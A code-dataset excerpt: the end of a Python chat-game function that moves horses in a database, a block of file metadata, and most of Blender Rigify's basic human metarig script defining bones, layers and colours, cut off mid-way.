response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
db.commit()
cursor.close()
db.close()
return response
| 53.89221
| 167
| 0.520833
| 7,555
| 59,497
| 3.92998
| 0.039709
| 0.153009
| 0.056987
| 0.057829
| 0.869051
| 0.85888
| 0.853929
| 0.84534
| 0.833081
| 0.824526
| 0
| 0.030338
| 0.352909
| 59,497
| 1,104
| 168
| 53.89221
| 0.740494
| 0
| 0
| 0.738889
| 0
| 0.012037
| 0.153712
| 0.025841
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001852
| false
| 0.000926
| 0.00463
| 0
| 0.023148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
221809e7a9e86b1ea6f5156df3a4a63147d41920
| 34,065
|
py
|
Python
|
blender/2.79/scripts/addons/rigify/metarigs/Basic/basic_human.py
|
uzairakbar/bpy2.79
|
3a3e0004ac6783c4e4b89d939e4432de99026a85
|
[
"MIT"
] | 2
|
2019-11-27T09:05:42.000Z
|
2020-02-20T01:25:23.000Z
|
rigify/metarigs/Basic/basic_human.py
|
1-MillionParanoidTterabytes/blender-addons-master
|
acc8fc23a38e6e89099c3e5079bea31ce85da06a
|
[
"Unlicense"
] | null | null | null |
rigify/metarigs/Basic/basic_human.py
|
1-MillionParanoidTterabytes/blender-addons-master
|
acc8fc23a38e6e89099c3e5079bea31ce85da06a
|
[
"Unlicense"
] | 4
|
2020-02-19T20:02:26.000Z
|
2022-02-11T18:47:56.000Z
|
import bpy
from mathutils import Color
def create(obj):
# generated by rigify.utils.write_metarig
bpy.ops.object.mode_set(mode='EDIT')
arm = obj.data
for i in range(6):
arm.rigify_colors.add()
arm.rigify_colors[0].name = "Root"
arm.rigify_colors[0].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[0].normal = Color((0.43529415130615234, 0.18431372940540314, 0.41568630933761597))
arm.rigify_colors[0].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[0].standard_colors_lock = True
arm.rigify_colors[1].name = "IK"
arm.rigify_colors[1].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[1].normal = Color((0.6039215922355652, 0.0, 0.0))
arm.rigify_colors[1].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[1].standard_colors_lock = True
arm.rigify_colors[2].name = "Special"
arm.rigify_colors[2].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[2].normal = Color((0.9568628072738647, 0.7882353663444519, 0.0470588281750679))
arm.rigify_colors[2].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[2].standard_colors_lock = True
arm.rigify_colors[3].name = "Tweak"
arm.rigify_colors[3].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[3].normal = Color((0.03921568766236305, 0.21176472306251526, 0.5803921818733215))
arm.rigify_colors[3].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[3].standard_colors_lock = True
arm.rigify_colors[4].name = "FK"
arm.rigify_colors[4].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[4].normal = Color((0.11764706671237946, 0.5686274766921997, 0.03529411926865578))
arm.rigify_colors[4].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[4].standard_colors_lock = True
arm.rigify_colors[5].name = "Extra"
arm.rigify_colors[5].active = Color((0.5490000247955322, 1.0, 1.0))
arm.rigify_colors[5].normal = Color((0.9686275124549866, 0.250980406999588, 0.0941176563501358))
arm.rigify_colors[5].select = Color((0.3140000104904175, 0.7839999794960022, 1.0))
arm.rigify_colors[5].standard_colors_lock = True
for i in range(29):
arm.rigify_layers.add()
arm.rigify_layers[0].name = " "
arm.rigify_layers[0].row = 1
arm.rigify_layers[0].set = False
arm.rigify_layers[0].group = 0
arm.rigify_layers[1].name = " "
arm.rigify_layers[1].row = 1
arm.rigify_layers[1].set = False
arm.rigify_layers[1].group = 0
arm.rigify_layers[2].name = " "
arm.rigify_layers[2].row = 1
arm.rigify_layers[2].set = False
arm.rigify_layers[2].group = 0
arm.rigify_layers[3].name = "Torso"
arm.rigify_layers[3].row = 3
arm.rigify_layers[3].set = False
arm.rigify_layers[3].group = 3
arm.rigify_layers[4].name = "Torso (Tweak)"
arm.rigify_layers[4].row = 4
arm.rigify_layers[4].set = False
arm.rigify_layers[4].group = 4
arm.rigify_layers[5].name = " "
arm.rigify_layers[5].row = 1
arm.rigify_layers[5].set = False
arm.rigify_layers[5].group = 0
arm.rigify_layers[6].name = " "
arm.rigify_layers[6].row = 1
arm.rigify_layers[6].set = False
arm.rigify_layers[6].group = 0
arm.rigify_layers[7].name = "Arm.L (IK)"
arm.rigify_layers[7].row = 7
arm.rigify_layers[7].set = False
arm.rigify_layers[7].group = 2
arm.rigify_layers[8].name = "Arm.L (FK)"
arm.rigify_layers[8].row = 8
arm.rigify_layers[8].set = False
arm.rigify_layers[8].group = 5
arm.rigify_layers[9].name = "Arm.L (Tweak)"
arm.rigify_layers[9].row = 9
arm.rigify_layers[9].set = False
arm.rigify_layers[9].group = 4
arm.rigify_layers[10].name = "Arm.R (IK)"
arm.rigify_layers[10].row = 7
arm.rigify_layers[10].set = False
arm.rigify_layers[10].group = 2
arm.rigify_layers[11].name = "Arm.R (FK)"
arm.rigify_layers[11].row = 8
arm.rigify_layers[11].set = False
arm.rigify_layers[11].group = 5
arm.rigify_layers[12].name = "Arm.R (Tweak)"
arm.rigify_layers[12].row = 9
arm.rigify_layers[12].set = False
arm.rigify_layers[12].group = 4
arm.rigify_layers[13].name = "Leg.L (IK)"
arm.rigify_layers[13].row = 10
arm.rigify_layers[13].set = False
arm.rigify_layers[13].group = 2
arm.rigify_layers[14].name = "Leg.L (FK)"
arm.rigify_layers[14].row = 11
arm.rigify_layers[14].set = False
arm.rigify_layers[14].group = 5
arm.rigify_layers[15].name = "Leg.L (Tweak)"
arm.rigify_layers[15].row = 12
arm.rigify_layers[15].set = False
arm.rigify_layers[15].group = 4
arm.rigify_layers[16].name = "Leg.R (IK)"
arm.rigify_layers[16].row = 10
arm.rigify_layers[16].set = False
arm.rigify_layers[16].group = 2
arm.rigify_layers[17].name = "Leg.R (FK)"
arm.rigify_layers[17].row = 11
arm.rigify_layers[17].set = False
arm.rigify_layers[17].group = 5
arm.rigify_layers[18].name = "Leg.R (Tweak)"
arm.rigify_layers[18].row = 12
arm.rigify_layers[18].set = False
arm.rigify_layers[18].group = 4
arm.rigify_layers[19].name = ""
arm.rigify_layers[19].row = 1
arm.rigify_layers[19].set = False
arm.rigify_layers[19].group = 0
arm.rigify_layers[20].name = ""
arm.rigify_layers[20].row = 1
arm.rigify_layers[20].set = False
arm.rigify_layers[20].group = 0
arm.rigify_layers[21].name = ""
arm.rigify_layers[21].row = 1
arm.rigify_layers[21].set = False
arm.rigify_layers[21].group = 0
arm.rigify_layers[22].name = ""
arm.rigify_layers[22].row = 1
arm.rigify_layers[22].set = False
arm.rigify_layers[22].group = 0
arm.rigify_layers[23].name = ""
arm.rigify_layers[23].row = 1
arm.rigify_layers[23].set = False
arm.rigify_layers[23].group = 0
arm.rigify_layers[24].name = ""
arm.rigify_layers[24].row = 1
arm.rigify_layers[24].set = False
arm.rigify_layers[24].group = 0
arm.rigify_layers[25].name = ""
arm.rigify_layers[25].row = 1
arm.rigify_layers[25].set = False
arm.rigify_layers[25].group = 0
arm.rigify_layers[26].name = ""
arm.rigify_layers[26].row = 1
arm.rigify_layers[26].set = False
arm.rigify_layers[26].group = 0
arm.rigify_layers[27].name = ""
arm.rigify_layers[27].row = 1
arm.rigify_layers[27].set = False
arm.rigify_layers[27].group = 0
arm.rigify_layers[28].name = "Root"
arm.rigify_layers[28].row = 14
arm.rigify_layers[28].set = False
arm.rigify_layers[28].group = 1
bones = {}
bone = arm.edit_bones.new('spine')
bone.head[:] = 0.0000, 0.0552, 1.0099
bone.tail[:] = 0.0000, 0.0172, 1.1573
bone.roll = 0.0000
bone.use_connect = False
bones['spine'] = bone.name
bone = arm.edit_bones.new('spine.001')
bone.head[:] = 0.0000, 0.0172, 1.1573
bone.tail[:] = 0.0000, 0.0004, 1.2929
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine']]
bones['spine.001'] = bone.name
bone = arm.edit_bones.new('pelvis.L')
bone.head[:] = 0.0000, 0.0552, 1.0099
bone.tail[:] = 0.1112, -0.0451, 1.1533
bone.roll = -1.0756
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['pelvis.L'] = bone.name
bone = arm.edit_bones.new('pelvis.R')
bone.head[:] = -0.0000, 0.0552, 1.0099
bone.tail[:] = -0.1112, -0.0451, 1.1533
bone.roll = 1.0756
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['pelvis.R'] = bone.name
bone = arm.edit_bones.new('thigh.L')
bone.head[:] = 0.0980, 0.0124, 1.0720
bone.tail[:] = 0.0980, -0.0286, 0.5372
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['thigh.L'] = bone.name
bone = arm.edit_bones.new('thigh.R')
bone.head[:] = -0.0980, 0.0124, 1.0720
bone.tail[:] = -0.0980, -0.0286, 0.5372
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['thigh.R'] = bone.name
bone = arm.edit_bones.new('spine.002')
bone.head[:] = 0.0000, 0.0004, 1.2929
bone.tail[:] = 0.0000, 0.0059, 1.4657
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.001']]
bones['spine.002'] = bone.name
bone = arm.edit_bones.new('shin.L')
bone.head[:] = 0.0980, -0.0286, 0.5372
bone.tail[:] = 0.0980, 0.0162, 0.0852
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['thigh.L']]
bones['shin.L'] = bone.name
bone = arm.edit_bones.new('shin.R')
bone.head[:] = -0.0980, -0.0286, 0.5372
bone.tail[:] = -0.0980, 0.0162, 0.0852
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['thigh.R']]
bones['shin.R'] = bone.name
bone = arm.edit_bones.new('spine.003')
bone.head[:] = 0.0000, 0.0059, 1.4657
bone.tail[:] = 0.0000, 0.0114, 1.6582
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.002']]
bones['spine.003'] = bone.name
bone = arm.edit_bones.new('foot.L')
bone.head[:] = 0.0980, 0.0162, 0.0852
bone.tail[:] = 0.0980, -0.0934, 0.0167
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['shin.L']]
bones['foot.L'] = bone.name
bone = arm.edit_bones.new('foot.R')
bone.head[:] = -0.0980, 0.0162, 0.0852
bone.tail[:] = -0.0980, -0.0934, 0.0167
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['shin.R']]
bones['foot.R'] = bone.name
bone = arm.edit_bones.new('spine.004')
bone.head[:] = 0.0000, 0.0114, 1.6582
bone.tail[:] = 0.0000, -0.0130, 1.7197
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.003']]
bones['spine.004'] = bone.name
bone = arm.edit_bones.new('shoulder.L')
bone.head[:] = 0.0183, -0.0684, 1.6051
bone.tail[:] = 0.1694, 0.0205, 1.6050
bone.roll = 0.0004
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.003']]
bones['shoulder.L'] = bone.name
bone = arm.edit_bones.new('shoulder.R')
bone.head[:] = -0.0183, -0.0684, 1.6051
bone.tail[:] = -0.1694, 0.0205, 1.6050
bone.roll = -0.0004
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.003']]
bones['shoulder.R'] = bone.name
bone = arm.edit_bones.new('breast.L')
bone.head[:] = 0.1184, 0.0485, 1.4596
bone.tail[:] = 0.1184, -0.0907, 1.4596
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.003']]
bones['breast.L'] = bone.name
bone = arm.edit_bones.new('breast.R')
bone.head[:] = -0.1184, 0.0485, 1.4596
bone.tail[:] = -0.1184, -0.0907, 1.4596
bone.roll = -0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.003']]
bones['breast.R'] = bone.name
bone = arm.edit_bones.new('toe.L')
bone.head[:] = 0.0980, -0.0934, 0.0167
bone.tail[:] = 0.0980, -0.1606, 0.0167
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['foot.L']]
bones['toe.L'] = bone.name
bone = arm.edit_bones.new('heel.02.L')
bone.head[:] = 0.0600, 0.0459, 0.0000
bone.tail[:] = 0.1400, 0.0459, 0.0000
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['foot.L']]
bones['heel.02.L'] = bone.name
bone = arm.edit_bones.new('toe.R')
bone.head[:] = -0.0980, -0.0934, 0.0167
bone.tail[:] = -0.0980, -0.1606, 0.0167
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['foot.R']]
bones['toe.R'] = bone.name
bone = arm.edit_bones.new('heel.02.R')
bone.head[:] = -0.0600, 0.0459, 0.0000
bone.tail[:] = -0.1400, 0.0459, 0.0000
bone.roll = -0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['foot.R']]
bones['heel.02.R'] = bone.name
bone = arm.edit_bones.new('spine.005')
bone.head[:] = 0.0000, -0.0130, 1.7197
bone.tail[:] = 0.0000, -0.0247, 1.7813
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.004']]
bones['spine.005'] = bone.name
bone = arm.edit_bones.new('upper_arm.L')
bone.head[:] = 0.1953, 0.0267, 1.5846
bone.tail[:] = 0.4424, 0.0885, 1.4491
bone.roll = 2.0724
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.L']]
bones['upper_arm.L'] = bone.name
bone = arm.edit_bones.new('upper_arm.R')
bone.head[:] = -0.1953, 0.0267, 1.5846
bone.tail[:] = -0.4424, 0.0885, 1.4491
bone.roll = -2.0724
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.R']]
bones['upper_arm.R'] = bone.name
bone = arm.edit_bones.new('spine.006')
bone.head[:] = 0.0000, -0.0247, 1.7813
bone.tail[:] = 0.0000, -0.0247, 1.9796
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.005']]
bones['spine.006'] = bone.name
bone = arm.edit_bones.new('forearm.L')
bone.head[:] = 0.4424, 0.0885, 1.4491
bone.tail[:] = 0.6594, 0.0492, 1.3061
bone.roll = 2.1535
bone.use_connect = True
bone.parent = arm.edit_bones[bones['upper_arm.L']]
bones['forearm.L'] = bone.name
bone = arm.edit_bones.new('forearm.R')
bone.head[:] = -0.4424, 0.0885, 1.4491
bone.tail[:] = -0.6594, 0.0492, 1.3061
bone.roll = -2.1535
bone.use_connect = True
bone.parent = arm.edit_bones[bones['upper_arm.R']]
bones['forearm.R'] = bone.name
bone = arm.edit_bones.new('hand.L')
bone.head[:] = 0.6594, 0.0492, 1.3061
bone.tail[:] = 0.7234, 0.0412, 1.2585
bone.roll = 2.2103
bone.use_connect = True
bone.parent = arm.edit_bones[bones['forearm.L']]
bones['hand.L'] = bone.name
bone = arm.edit_bones.new('hand.R')
bone.head[:] = -0.6594, 0.0492, 1.3061
bone.tail[:] = -0.7234, 0.0412, 1.2585
bone.roll = -2.2103
bone.use_connect = True
bone.parent = arm.edit_bones[bones['forearm.R']]
bones['hand.R'] = bone.name
bpy.ops.object.mode_set(mode='OBJECT')
pbone = obj.pose.bones[bones['spine']]
pbone.rigify_type = 'spines.super_spine'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.neck_pos = 5
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['pelvis.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_control = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['pelvis.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_control = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['thigh.L']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "leg"
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['thigh.R']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.limb_type = "leg"
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shin.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shin.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['foot.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['foot.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shoulder.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['shoulder.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['breast.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['breast.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['toe.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['heel.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['toe.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['heel.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.005']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['upper_arm.L']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['upper_arm.R']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.006']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forearm.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forearm.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['hand.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
